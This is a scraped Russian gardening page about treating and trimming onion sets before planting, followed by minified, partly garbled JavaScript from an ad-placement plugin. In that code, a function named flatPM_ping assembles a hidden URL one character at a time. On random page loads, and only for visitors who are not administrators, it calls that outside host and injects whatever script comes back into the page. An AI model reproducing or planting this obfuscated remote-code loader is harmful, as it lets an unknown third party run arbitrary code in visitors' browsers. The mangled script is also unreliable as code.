Медный купорос

Применяют при плохом качестве посевного материала. В 1 ведре теплой воды разводят 1,5 ст. ложки препарата и выдерживают севок 2-3 часа. Далее севок просушивают.

Важно! Лук нельзя обрабатывать медным купоросом совместно при замачивании в марганцовке или Фитоспорине.

Фитоспорин от грибка

Фитоспорин поможет защитить лук от грибковых инфекций. В ведре воды разводят 35 г средства и держат севок 20-30 минут.

Березовый деготь от луковой мухи

С луковой мухой поможет справиться березовый деготь. В 1 л воды комнатной температуры разводят 1 ст. ложку средства и держат севок 2-3 часа. Далее луковицы просушивают.

Для стимуляции роста

Для ускорения прорастания и получения хорошего урожая посадочный материал обрабатывают стимуляторами роста.

Древесная зола

Самое популярное и доступное средство, насыщенное калием и природными антисептиками.

Данная процедура также защищает лук от гниения после посадки.

В 10 л воды разводят 0,5 л банку золы и выдерживают луковицы 10 минут. Далее их просушивают 2-3 часа.

Капсулу Эпина растворяют в воде 50 градусов по инструкции, указанной на упаковке и выдерживают севок 10-15 минут.

Также можно применять Биостим, Силк согласно инструкции.

Важно! При подзимней посадке лук не обрабатывают стимуляторами роста.

Для уменьшения стрелкования

Прогрев и закаливание, о которых было рассказано в начале статьи необходимы для предотвращения раннего образования стрелок.

Совет! Замачивать лук лучше в сетке, сверху положить груз, чтобы посевной материал не всплывал. При этом груз не должен повредить севок.

Самый простой способ подготовки лука к посадке — замачивание в чистой воде +50 °С на 10-15 минут.

Koмбиниpoвaннaя oбpaбoткa

Moжнo приготовить комбинированный раствор:

  • coль – 2 cт. ложки;
  • зoлa – 2 cт. ложки;
  • вода 60ºC – 3 литра.
  • все смешать и добавить тeмнo-poзoвый pacтвop мapгaнцoвки;
  • лук держат в этом средстве 2 чaca.

Надо ли обрезать верхушку севка перед посадкой

При выращивании лука на маленьком участке рекомендуется провести образку верхушки, чтобы ускорить прорастание и воздать лучшие условия для вегетации.

Правильная обрезка заключается в обрезке сплетённой части верхушки на 2-4 мм сверху и корешков. Это сделает замачивание более эффективным, так как раствор глубже проникнет между чешуйками.

Важно! Не надо срезать с верхушки слишком много, чтобы севок не загнил вовремя выпустил зелень.

На перо с крупных головок срезается 1/3 верхушки. При посадке на головку обрезают только хвостик, чтобы не повредить белую кожицу.

Некоторые сорта обрезаются с двух сторон для ускорения роста и образования корневой системы. Результаты видны уже через несколько дней.

Опытные огородники рекомендуют обрезать сплетённую часть верхушки, так как перьям сложно через нее пробиваться.

От предпосевной обработки зависит качество будущего урожая лука. Она включает комплекс агротехнических мероприятий, благодаря которым можно вырастить вкусные и здоровые плоды.

Посмотрите видео! Подготовка и посадка лука севка весной

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};